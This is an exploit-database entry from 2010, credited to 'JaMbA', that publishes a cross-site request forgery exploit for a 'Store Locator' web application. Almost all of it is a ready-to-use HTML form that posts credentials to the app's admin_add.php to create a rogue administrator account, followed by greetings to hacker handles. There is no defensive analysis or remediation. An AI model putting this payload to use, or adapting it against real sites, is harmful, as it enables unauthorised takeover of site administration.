[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Store Locator Remote Add Admin Exploit CSRF Vulnerability
# Published : 2010-06-10
# Author : JaMbA
# Previous Title : SchoolMation Version 2.3 SQLi and XSS Vulnerability
# Next Title : EZPX Photoblog 1.2 beta Remote File Inclusion Exploit
# vendor: www.ghostscripter.com
::::::::::::::[explo!t]:::::::
:::::::
<html>
<head>
<title> Store Locator Remote Add Admin Exploit </title>
</head>
<body text="#00FF00" bgcolor="#000000">
<form action=http://server/StoreLocator/adm/admin_add.php method=post
style="text-align: center">
<br>
User: <input name="username" type="text" id="username" value="" />
<br>
Pass: <input name="password" type="password" id="password" value="" />
<br>
<input type="submit" name="Submit" value="Create Admin" /><br>
<br>
</p>
</form>
</body>
<html>
::::::::::::::::::::::::::::::::::::::::::
Greetz to : Alnjm33-virus-pal - Predator-bingo2 - xXx-jago-dz
-inejcteur-4PY-SaYrOs- XR57 -Tr0y-x Ahmadso -alsaek
AnD all Tunisian hacker
:::::::::::::::::::S.W.T:::::::::::::::::::::